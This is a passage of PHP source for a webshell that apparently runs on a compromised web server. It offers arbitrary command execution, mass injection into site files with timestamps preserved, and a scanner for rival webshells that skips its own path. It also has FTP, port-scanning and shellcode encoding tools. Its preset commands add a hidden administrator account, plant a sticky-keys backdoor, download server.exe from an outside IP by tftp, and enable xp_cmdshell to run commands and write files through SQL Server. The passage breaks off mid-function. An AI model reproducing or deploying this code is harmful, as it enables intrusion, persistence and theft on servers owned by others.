<div class="actall" style="height:35px;">Path: <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--select type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">js</option>
</select></div>
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked>Designated Content Of The Repalce File <input type="radio" name="th" value="b" onclick="showth('b')">Download Url Of The Replace File<br>
<div id="setauto">Searchment:&nbsp <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement: <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>keep file time unchanged</div>
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="tb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="Begin" onclick="autoup();"></div>
</form>
END;
    return true;
}
//clean trojan
function Antivirus_Auto($sp, $features, $st)
{
    if (($h_d = @opendir($sp)) == NULL) {
        return false;
    }
    $ROOT_DIR = File_Mode();
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' || $Filename == '..') {
            continue;
        }
        $Filepath = File_Str($sp . '/' . $Filename);
        if (is_dir($Filepath)) {
            Antivirus_Auto($Filepath, $features, $st);
        }
        if (eregi($st, $Filename)) {
            if ($Filepath == File_Str("/var/www/html/52520.php.3d3474a7d76347cdb3be87db9d617f65.bin")) {
                continue;
            }
            $ic = File_Read($Filepath);
            foreach ($features as $var => $key) {
                if (stristr($ic, $key)) {
                    $Fileurls = str_replace($ROOT_DIR, 'http://' . $_SERVER['SERVER_NAME'] . '/', $Filepath);
                    $Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
                    echo '<a href="' . $Fileurls . '" target="_blank"><font color="#FF0000">' . $Filepath . '</font></a><br>��<a href="?s=e&fp=' . urlencode($sp) . '&fn=' . $Filename . '&dim=' . urlencode($key) . '" target="_blank">Edit</a> <a href="?s=e&df=' . urlencode($Filepath) . '" target="_blank">Del</a>�� ';
                    echo '��' . $Filetime . '�� <font color="#FF0000">' . $var . '</font><br><br>';
                    break;
                }
            }
            ob_flush();
            flush();
        }
    }
    @closedir($h_d);
    return true;
}
function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo " <font style=font:11pt color=ff0000>del successfully</font>";
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? ' <font style=font:11pt color=ff0000>del successfully</font>' : ' <font style=font:11pt color=ff0000>del faild</font>';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = File_Mode() == '' ? File_Str("/var/www/html") : File_Mode();
    $features_php = array('ftp.class.php' => 'ftp.class.php', 'cha88.cn' => 'cha88.cn', 'Security Angel Team' => 'Security Angel Team', 'read()' => '->read()', 'readdir' => 'readdir(', 'return string soname' => 'returns string soname', 'eval()' => 'eval(gzinflate(', 'eval(base64_decode())' => 'eval(base64_decode(', 'eval($_POST)' => 'eval($_POST', 'eval($_REQUEST)' => 'eval($_REQUEST', 'eval ($_)' => 'eval ($_', 'copy()' => 'copy($_FILES', 'copy ()' => 'copy ($_FILES', 'move_uploaded_file()' => 'move_uploaded_file($_FILES', 'move_uploaded_file ()' => 'move_uploaded_file ($_FILES', 'str_replace()' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('����·��' => '����·��', '�����������' => '�����������', 'fso.createtextfile()' => 'fso.createtextfile(path,true)', '<%execute(request())%>' => '<%execute(request', '<%eval request()%>' => '<%eval request', 'execute session()' => 'execute session(', '--Created!' => '--Created!', 'WScript.Shell' => 'WScript.Shell', '<%s LANGUAGE = VBScript.Encode %>' => '<%@ LANGUAGE = VBScript.Encode %>', 'www.rootkit.net.cn' => 'www.rootkit.net.cn', 'Process.GetProcesses' => 'Process.GetProcesses', 'lake2' => 'lake2');
    print <<<END
<div class="actall" style="height:100px;"><form method="POST" name="tform" id="tform" action="?s=e">
Path: <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:400px;">
<select name="st">
<option value="php">phpshell</option>
<option value="asx">aspshell+aspxshell</option>
<option value="ppp">phpshell+aspshell+aspxshell</option>
</select>
<input class="bt" type="submit" value="Scan">
</form><br>
END;
    if (!empty($_POST['sp'])) {
        if ($_POST['st'] == 'php') {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\;';
        }
        if ($_POST['st'] == 'asx') {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\.cdx|\\;';
        }
        if ($_POST['st'] == 'ppp') {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\.asp|\\.asa|\\.cer|\\.cdx|\\.aspx|\\.ascx|\\;';
        }
        echo Antivirus_Auto($_POST['sp'], $features_all, $st) ? 'Done' : 'Abort';
    }
    echo "</div>";
    return true;
}
//search file
function Findfile_Auto($sfp, $sfc, $sft, $sff, $sfb)
{
    //echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
    if (($h_d = @opendir($sfp)) == NULL) {
        return false;
    }
    while (false !== ($Filename = @readdir($h_d))) {
        if ($Filename == '.' || $Filename == '..') {
            continue;
        }
        if (eregi($sft, $Filename)) {
            continue;
        }
        $Filepath = File_Str($sfp . '/' . $Filename);
        if (is_dir($Filepath) && $sfb) {
            Findfile_Auto($Filepath, $sfc, $sft, $sff, $sfb);
        }
        if ($sff) {
            if (stristr($Filename, $sfc)) {
                echo '<a target="_blank" href="?s=p&fp=' . urlencode($sfp) . '&fn=' . urlencode($Filename) . '"> ' . $Filepath . ' </a><br>' . "\r\n";
                ob_flush();
                flush();
            }
        } else {
            $File_code = File_Read($Filepath);
            if (stristr($File_code, $sfc)) {
                echo '<a target="_blank" href="?s=p&fp=' . urlencode($sfp) . '&fn=' . urlencode($Filename) . '"> ' . $Filepath . ' </a><br>' . "\r\n";
                ob_flush();
                flush();
            }
        }
    }
    @closedir($h_d);
    return true;
}
function Findfile_j()
{
    if (!empty($_GET['df'])) {
        echo $_GET['df'];
        if (@unlink($_GET['df'])) {
            echo "<font style=font:11pt color=ff0000>del successfully</font>";
        } else {
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? '<font style=font:11pt color=ff0000>del successfully</font>' : '<font style=font:11pt color=ff0000>del faild</font>';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
    $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
    $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
    print <<<END
<form method="POST" name="jform" id="jform" action="?s=u">
<div class="actall">Scan Path <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">&nbspFile Filter&nbsp <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">Keywords <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>search filename 
<input type="radio" name="sff" value="b">search include keywords</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="sfb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="submit" value="scan" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sfp']) && !empty($_POST['sfc'])) {
        echo "<div class=\"actall\">";
        $_POST['sft'] = str_replace('.', '\\.', $_POST['sft']);
        $sff = $_POST['sff'] == 'a' ? true : false;
        $sfb = $_POST['sfb'] == 'a' ? true : false;
        echo Findfile_Auto($_POST['sfp'], $_POST['sfc'], $_POST['sft'], $sff, $sfb) ? '<font style=font:11pt color=ff0000>Done</font>' : '<font style=font:11pt color=ff0000>Error</font>';
        echo "</div>";
    }
    return true;
}
//ftp connect
function filecollect($dir, $filelist)
{
    $files = ftp_nlist($conn, $dir);
    return $files;
}
function ftp_php()
{
    $dir = "";
    $ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1';
    $ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root';
    $ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'root';
    $ftplist = isset($_POST['list']) ? $_POST['list'] : '';
    $ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/';
    $ftpfolder = strtr($ftpfolder, "\\", "/");
    $files = isset($_POST['readfile']) ? $_POST['readfile'] : '';
    print <<<END
<br><br><div class="actall"><h5>connect ftp server with php</h5><br></div>
<form method="POST" name="" action=""><br>
<div class="actall">Host:<input type="text" name="ftphost" value="{$ftphost}" style="width:100px">
User:<input type="text" name="ftpuser" value="{$ftpuser}" style="width:100px">
Pass:<input type="text" name="ftppass" value="{$ftppass}" style="width:100px"><br><br>
<input type="hidden" name="readfile" value="" style="width:200px">
folder:<input type="text" name="ftpfolder" value="{$ftpfolder}" style="width:200px">
<input type="hidden" name="list" value="list">
<input class="bt" type="submit" name="list" value="list" style="width:40px"><br><br></form></div>
END;
    if ($ftplist == 'list') {
        $conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
        if (@ftp_login($conn, $ftpuser, $ftppass)) {
            $filelists = @ftp_nlist($conn, $ftpfolder);
            echo "<pre>";
            echo "current folder is <font color='#FF0000'>{$ftpfolder}</font>:<br>";
            if (is_array($filelists)) {
                foreach ($filelists as $file) {
                    $file = strtr($file, "\\", "/");
                    $size_file = @ftp_size($conn, $file);
                    if ($size_file == -1) {
                        $a = $a . basename($file) . "<br>";
                    } else {
                        $b = $b . basename($file) . "\t\t\t\t" . $size_file . "B</br>";
                    }
                }
            }
            echo $a;
            echo $b;
            echo "</pre>";
        }
    }
    print <<<END
<form method="POST" name="" action="" >
<div class="actall">filename:<input type="text" name="readfile" value="{$files}" style="width:200px">
<input type="hidden" name="read" value="read">
<input class="bt" type="submit" name="read" value="read" style="width:40px"><br><br></form></div>
END;
    $readaction = isset($_POST['read']) ? $_POST['read'] : '';
    if ($readaction == 'read') {
        $handle = @file_get_contents("ftp://{$ftpuser}:{$ftppass}@{$ftphost}/{$files}", "r");
        $handle = htmlspecialchars($handle);
        $handle = str_replace("\n", "<br>", $handle);
        echo "the content of <font color='#FF0000'>{$files}</font> is:<br><br>";
        echo $handle;
    }
    print <<<END
<form method="post" enctype="multipart/form-data" name="" action="">
<div class="actall">folder:<input type="text" name="cdir" value="{$cdir}" style="width:100px">
<input type="file" name="upload" value="upload" style="width:200px;height:22px;">
<input type="hidden" name="upfile" value="upfile">
<input class="bt" type="submit" name="submit" value="upfile" style="width:40px"><br><br></form></div>
END;
    $upaction = isset($_POST['upfile']) ? $_POST['upfile'] : '';
    if ($upaction == 'upfile') {
        $cdir = isset($_POST['cdir']) ? $_POST['cdir'] : '/';
        $conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
        if (@ftp_login($conn, $ftpuser, $ftppass)) {
            @ftp_chdir($conn, $cdir);
            $res_code = @ftp_put($conn, $_FILES['upload']['name'], $_FILES['upload']['tmp_name'], FTP_BINARY, 0);
            if (empty($res_code)) {
                echo "<font color=\"#FF67A0\">ftp upload faild</font><br>";
            } else {
                echo "<font color=\"#FF67A0\">ftp upload successful</font><br>";
            }
        }
    }
    print <<<END
<form method="POST" enctype="multipart/form-data" name="" action="">
<div class="actall">path:<input type="text" name="downfile" value="{$getfile}" style="width:100px">
<input type="hidden" name="getfile" value="down">
<input class="bt" type="submit" name="down" value="down" style="width:40px"><br><br></form></div>
END;
    $getfile = isset($_POST['downfile']) ? $_POST['downfile'] : '';
    $getaction = isset($_POST['getfile']) ? $_POST['getfile'] : '';
    if ($getaction == 'down' && $getfile != '') {
        function php_ftp_download($filename)
        {
            global $ftphost, $ftpuser, $ftppass;
            $ftp_path = dirname($filename) . "/";
            $select_file = basename($filename);
            $ftp = @ftp_connect($ftphost);
            if ($ftp) {
                if (@ftp_login($ftp, $ftpuser, $ftppass)) {
                    if (@ftp_chdir($ftp, $ftp_path)) {
                        $tmpfile = tempnam(getcwd(), "temp");
                        if (ftp_get($ftp, $tmpfile, $select_file, FTP_BINARY)) {
                            ftp_quit($ftp);
                            header("Content-Type:application/octet-stream");
                            header("Content-Disposition:attachment;  filename=" . $select_file);
                            unlink($tmpfile);
                            exit;
                        }
                    }
                }
            }
            ftp_quit($ftp);
        }
        php_ftp_download($getfile);
    }
}
//server info
function Info_Cfg($varname)
{
    switch ($result = get_cfg_var($varname)) {
        case 0:
            return "No";
        case 1:
            return "Yes";
        default:
            return $result;
    }
}
function Info_Fun($funName)
{
    return false !== function_exists($funName) ? "Yes" : "No";
}
function Info_f()
{
    $dis_func = get_cfg_var("disable_functions");
    $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "upfile forbidden";
    $adminmail = isset($_SERVER['SERVER_ADMIN']) ? "<a href=\"mailto:" . $_SERVER['SERVER_ADMIN'] . "\">" . $_SERVER['SERVER_ADMIN'] . "</a>" : "<a href=\"mailto:" . get_cfg_var("sendmail_from") . "\">" . get_cfg_var("sendmail_from") . "</a>";
    if ($dis_func == "") {
        $dis_func = "No";
    } else {
        $dis_func = "No";
        $dis_func = "No";
    }
    $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
    $info = array(array("server time", date("Y-m-d h:i:s", time())), array("server domain", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("server ip", gethostbyname($_SERVER['SERVER_NAME'])), array("server os", PHP_OS), array("server os language", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("server powerby", $_SERVER['SERVER_SOFTWARE']), array("your IP", getenv('REMOTE_ADDR')), array("server port", $_SERVER['SERVER_PORT']), array("php run mode", strtoupper(php_sapi_name())), array("php ver", PHP_VERSION), array("run in safe mode", Info_Cfg("safemode")), array("server administrator", $adminmail), array("current file path", "/var/www/html/52520.php.3d3474a7d76347cdb3be87db9d617f65.bin"), array("allow_url_fopen", Info_Cfg("allow_url_fopen")), array("enable load dll", Info_Cfg("enable_dl")), array("display_errors", Info_Cfg("display_errors")), array("register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("memory_limit", Info_Cfg("memory_limit")), array("post_max_size", Info_Cfg("post_max_size")), array("upload_max_filesize", $upsize), array("max_execution_time", Info_Cfg("max_execution_time") . "second"), array("disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("free disk space", intval(diskfreespace(".") / 1048576) . 'Mb'), array("GD Library", Info_Fun("imageline")), array("IMAP", Info_Fun("imap_close")), array("Mysql database", Info_Fun("mysql_close")), array("SyBase database", Info_Fun("sybase_close")), array("Oracle database", Info_Fun("ora_close")), array("Oracle 8 database", Info_Fun("OCILogOff")), array("PREL PCRE", Info_Fun("preg_match")), array("support PDF", Info_Fun("pdf_close")), array("Postgresql database", Info_Fun("pg_close")), array("SNMP", Info_Fun("snmpget")), array("Zlib", Info_Fun("gzclose")), array("parse XML", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC", Info_Fun("odbc_close")), array("support Session", Info_Fun("session_start")), array("support Socket", Info_Fun("fsockopen")));
    echo "<table width=\"100%\" border=\"0\">";
    for ($i = 0; $i < count($info); $i++) {
        echo '<tr><td width="40%">' . $info[$i][0] . '</td><td>' . $info[$i][1] . '</td></tr>' . "\n";
    }
    echo "</table>";
    return true;
}
//execute command with php function
function Exec_Run($cmd)
{
    $res = '';
    if (function_exists('exec')) {
        @exec($cmd, $res);
        $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (@is_resource($f = @popen($cmd, "r"))) {
        $res = '';
        while (!@feof($f)) {
            $res .= @fread($f, 1024);
        }
        @pclose($f);
    }
    return $res;
}
function Exec_g()
{
    echo "<br>";
    $res = 'back screen';
    $cmd = 'dir';
    if (!empty($_POST['cmd'])) {
        $res = Exec_Run($_POST['cmd']);
        $cmd = $_POST['cmd'];
    }
    print <<<END
<script language="javascript">
function sFull(i){
\tStr = new Array(11);
\tStr[0] = "ver";
        Str[1] = "path";
        Str[2] = "ipconfig /all";
        Str[3] = "whoami";
        Str[4] = "tasklist /svc";
        Str[5] = "netstat -an";
        Str[6] = "systeminfo";
\tStr[7] = "net user";
        Str[8] = "net view";
        Str[9] = "net config workstation";
        Str[10] = "net config server";
\tStr[11] = "net user b4che10r b4che10r /add & net localgroup administrators b4che10r /add";
\tStr[12] = "query user";
\tStr[13] = "copy c:\\1.php d:\\2.php";
        Str[14] = "copy c:\\windows\\explorer.exe c:\\windows\\system32\\sethc.exe & copy c:\\windows\\system32\\sethc.exe c:\\windows\\system32\\dllcache\\sethc.exe";
\tStr[15] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
        Str[16] = "ps -ef";
        Str[17] = "ifconfig";
        Str[18] = "cat /etc/syslog.conf";
        Str[19] = "cat /etc/my.cnf";
        Str[20] = "cat /etc/hosts";
        Str[21] = "cat /etc/services";
\tdocument.getElementById('cmd').value = Str[i];
\treturn true;
}
</script>
<div class="actall"><form method="POST" name="gform" id="gform" action="?s=g">
Command: <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:369px;">
<select onchange='return sFull(options[selectedIndex].value)'>
<option value="0" selected>----Command Collection----</option>
<option value="1">path(win)</option>
<option value="2">ipconfig(win)</option>
<option value="3">whoami(win)</option>
<option value="4">tasklist(win)</option>
<option value="5">port view</option>
<option value="6">systeminfo(win)</option>
<option value="7">net user(win)</option>
<option value="8">net view(win)</option>
<option value="9">net config workstation(win)</option>
<option value="10">net config server(win)</option>
<option value="11">add administrators(win)</option>
<option value="12">query user(win)</option>
<option value="13">copy file(win)</option>
<option value="14">shift backdoor(win)</option>
<option value="15">FTP download(win)</option>
<option value="16">ps(linux)</option>
<option value="17">ifconfig(linux)</option>
<option value="18">syslog.conf(linux)</option>
<option value="19">my.cnf(linux)</option>
<option value="20">hosts(linux)</option>
<option value="21">services(linux)</option>

</select>
<input class="bt" type="submit" value="execute" ></div>
<div class="actall"><textarea name="show" style="width:720px;height:450px;">{$res}</textarea></div>
</form>
END;
    return true;
}
//api
function Com_h()
{
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    $com = array("adodb" => "ADODB.Connection", "wscript" => "WScript.shell", "application" => "Shell.Application");
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a></div>
<div class="actall" style="height:200px;">
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
END;
    $shell = new COM($com[$object]);
    if ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
        print <<<END
&nbspcmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['cmd'])) {
            $exe = @$shell->exec("{$cmdpath} /c " . $cmd);
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini';
        print <<<END
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<br><br><input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['run'])) {
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==10) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***";
\tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
\tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
\tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
        Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
        Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
        Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
\tStr[8] = "DSN=mydns;Uid=username;Pwd=password";
        Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password";
        Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
\tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
\tStr[13] = "UPDATE [TableName] SET USER='b4che10r' WHERE ID=100";
\tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[15] = "DROP TABLE [TableName]";
\tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
        Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');";
        Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
        Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
        Str[23] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';";
\tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';";
        Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
        Str[26] = "Select Name FROM Master..SysDatabases;";
        Str[27] = "select name from sysobjects where type='U';";
        Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
        Str[29] = "select username,password from dba_users;";
        Str[30] = "select TABLE_NAME from all_tables;";
        Str[31] = "desc admin;";
        Str[32] = "grant connect,resource,dba to user_name;";
        Str[33] = "select datname from pg_database;";
        Str[34] = "select relname from pg_stat_user_tables;";
        Str[35] = "\\\\d table_name";
        Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
        Str[37] = "\\\\! uname -a";
        Str[38] = "select schemaname from syscat.schemata;";
        Str[39] = "select name from sysibm.systables;";
        Str[40] = "select colname from syscat.columns where tabname='table_name';";
        Str[41] = "db2 get db cfg for db_name;";
        Str[42] = "select name from sysdatabases;";
        Str[43] = "select tabname from systables where tabid=n;";
        Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
        Str[45] = "select username,usertype,password from sysusers;";
        if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--select range--</option>
<option value="1">Access</option>
<option value="2">MsSql</option>
<option value="3">MySql</option>
<option value="4">Oracle</option>
<option value="5">DB2</option>
<option value="6">PostGreSQL</option>
<option value="7">Informix</option>
<option value="8">DSN</option>
<option value="9">FILEDSN</option>
<option value="10">--sql statement--</option>
<option value="11">show data</option>
<option value="12">insert data</option>
<option value="13">update data</option>
<option value="14">create table</option>
<option value="15">drop table</option>
<option value="16">add column</option>
<option value="17">access shell()</option>
<option value="18">add xp_cmdsehll(sql2005)</option>
<option value="19">add oacreate(sql2005)</option>
<option value="20">add openrowset(sql2005)</option>
<option value="21">add xp_cmdsehll(sql2000)</option>
<option value="22">add oacreate(sql2000)</option>
<option value="23">oamethod exec</option>
<option value="24">sp_makewebtask</option>
<option value="25">xp_cmdshell</option>
<option value="26">databases(sql)</option>
<option value="27">tables(sql)</option>
<option value="28">columns(sql)</option>
<option value="29">hashes(oracle)</option>
<option value="30">tables(oracle)</option>
<option value="31">columns(oracle)</option>
<option value="32">grant(oracle)</option>
<option value="33">databases(pgsql)</option>
<option value="34">tables(pgsql)</option>
<option value="35">columns(pgsql)</option>
<option value="36">pg_hba.conf(pgsql)</option>
<option value="37">os-command(pgsql)</option>
<option value="38">databases(db2)</option>
<option value="39">tables(db2)</option>
<option value="40">columns(db2)</option>
<option value="41">db config(db2)</option>
<option value="42">databases(informix)</option>
<option value="43">tables(informix)</option>
<option value="44">columns(informix)</option>
<option value="45">hashes(informix)</option>
</select>
<br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;">
<input class="bt" type="submit" value="execute">
</form><br>
END;
        if (!empty($string)) {
            @$shell->Open($string);
            $result = @$shell->Execute($sql);
            $count = $result->Fields->Count();
            for ($i = 0; $i < $count; $i++) {
                $Field[$i] = $result->Fields($i);
            }
            echo $result ? $sql . ' Done<br>' : $sql . ' Faild<br>';
            if (!empty($count)) {
                while (!$result->EOF) {
                    for ($i = 0; $i < $count; $i++) {
                        echo $Field[$i]->value . '<br>';
                    }
                    @$result->MoveNext();
                }
            }
            $shell->Close();
        }
    }
    $shell = NULL;
    echo "</div>";
    return true;
}
//scan port
function Port_i()
{
    print "<div class=\"actall\" style=\"height:200px;\">\n<form method=\"POST\" name=\"iform\" id=\"iform\" action=\"?s=i\">\nScan IP<br><input type=\"text\" name=\"ip\" value=\"127.0.0.1\" style=\"width:600px;\">\n<br><br>Ports<br><input type=\"text\" name=\"port\" value=\"21|22|1433|1521|3306|3389|4899|5432|5631|5800|8000|8080|43958\" style=\"width:600px;\">\n<br><br> <input class=\"bt\" type=\"submit\" value=\"Scan\">\n</form><br>";
    if (!empty($_POST['ip']) && !empty($_POST['port'])) {
        $ports = explode('|', $_POST['port']);
        for ($i = 0; $i < count($ports); $i++) {
            $fp = @fsockopen($_POST['ip'], $ports[$i], &$errno, &$errstr, 1);
            echo $fp ? '<font color="#FF0000">Openned Ports ---> ' . $ports[$i] . '</font><br>' : 'Closed Ports ---> ' . $ports[$i] . '<br>';
            ob_flush();
            flush();
        }
    }
    echo "</div>";
    return true;
}
//convert shellcode
function shellcode_decode($Url_String, $Oday_value)
{
    $Oday_value = hexdec($Oday_value);
    ${$Url_String} = str_replace(" ", "", $Url_String);
    $SHELL = explode("%u", $Url_String);
    for ($i = 0; $i < count($SHELL); $i++) {
        $Temp = $SHELL[$i];
        $s_1 = substr($Temp, 2);
        $s_2 = substr($Temp, 0, 2);
        $COPY .= $s_1 . $s_2;
    }
    for ($n = 0; $n < strlen($COPY); $n += 2) {
        $Decode .= pack("C", hexdec(substr($COPY, $n, 2)) ^ $Oday_value);
    }
    return $Decode;
}
function shellcode_encode($Url_String, $Oday_value)
{
    $Length = strlen($Url_String);
    $Todec = hexdec($Oday_value);
    for ($i = 0; $i < $Length; $i++) {
        $Temp = ord($Url_String[$i]);
        $Hex_Temp = dechex($Temp ^ $Todec);
        if (hexdec($Hex_Temp) < 16) {
            $Hex_Temp = '0' . $Hex_Temp;
        }
        $hex .= $Hex_Temp;
    }
    if ($Length % 2) {
        $hex .= $Oday_value . $Oday_value;
    } else {
        $hex .= $Oday_value . $Oday_value . $Oday_value . $Oday_value;
    }
    for ($n = 0; $n < strlen($hex); $n += 4) {
        $Temp = substr($hex, $n, 4);
        $s_1 = substr($Temp, 2);
        $s_2 = substr($Temp, 0, 2);
        $Encode .= '%u' . $s_1 . $s_2;
    }
    return $Encode;
}
function shellcode_findxor($Url_String)
{
